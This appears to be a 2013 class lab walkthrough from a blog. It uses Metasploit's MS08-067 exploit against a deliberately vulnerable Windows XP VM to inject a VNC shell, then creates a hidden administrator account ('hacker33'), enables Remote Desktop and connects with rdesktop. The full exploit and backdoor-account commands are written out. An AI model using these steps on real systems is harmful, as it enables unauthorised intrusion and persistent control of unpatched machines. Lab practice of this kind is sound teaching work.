Thứ Sáu, 29 tháng 11, 2013

Metasploit: MS08-067 - Establishing A VNCShell & rdesktop to Victim Machine


Section 1. Log into Damn Vulnerable WXP-SP2
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.
  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.

Section 2. Log into BackTrack5
  1. Start Up BackTrack5R1.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx
  4. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  5. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.107.  In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Damn Vulnerable WXP-SP2).
Section 3. Starting up the Metasploit MSF Console
  1. Start Up Metasploit msfconsole
    • Instructions:
      1. Applications --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.
  2. msfconsole screen
    • Note(FYI):
      • This is the msfconsole
  3. Search for the MS08-067 Exploit
    • Instructions:
      1. search ms08_067
  4. Use exploit MS08-067 Exploit
    • Instructions:
      1. use exploit/windows/smb/ms08_067_netapi
  5. Show Payloads
    • Instructions:
      1. show payloads
  6. Set Payloads
    • Instructions:
      1. set PAYLOAD windows/vncinject/bind_tcp
      2. Press <Enter>
    • Note:
      • This Payload will create a VNC Server/Shell Using TCP.
  7. Show Options
    • Instructions:
      1. show options
    • Note(FYI):
      • Notice the Required Column.  RPORT and SMBPIPE are already populated, but RHOST is not.
      • In the next step, you will populate RHOST with the IP Address of the victim machine (Damn Vulnerable WXP-SP2).
  8. Set RHOST and Verify
    • Note(FYI):
      • Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
    • Instructions:
      1. set RHOST 192.168.1.116
      2. show options
        • The Victim's IP Address is now set.
  9. Exploit the Victim Machine
    • Instructions:
      1. exploit
    • Note(FYI):
      • Notice that the vncinject stage was sent to the victim's IP Address.  (See Below).
  10. Verify VNC TCP Connection
    • Instructions:
      1. netstat -nao | findstr :4444
        • In my case, 1052 is the process ID for the VNC Metasploit session.
        • In your case it will be different.
        • Use your PID with the following command.
      2. tasklist | findstr 1052
  11. Create New Attacker Account
    • Instructions:
      1. net user hacker33 abc123 /add
      2. net localgroup administrators hacker33 /add
  12. Open Control Panel
    • Instructions:
      1. Start --> Control Panel
  13. Open System
    • Instructions:
      1. Double Click on System
  14. Allow Remote Desktop
    • Instructions:
      1. Click on the Remote Tab
      2. Check Allow Remote Assistance invitations to be sent from the computer.
      3. Check Allow users to connect remotely to this computer
      4. Click OK
  15. Reboot Damn Vulnerable WXP-SP2
    • Instructions:
      1. shutdown /r
    • Note(FYI):
      • We are going to test the hacker33 account that we just created on Damn Vulnerable WXP-SP2.
  16. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  17. rdesktop to Damn Vulnerable WXP-SP2
    • Note(FYI):
      • Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
    • Instructions:
      1. Wait until Damn Vulnerable WXP-SP2 has rebooted and is at the login screen
      2. rdesktop -u hacker33 -p abc123 192.168.1.116
  18. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
  19. Set Stronger Password
    • Instructions:
      1. net user hacker33 s0m3t41ng!
 

Không có nhận xét nào:

Đăng nhận xét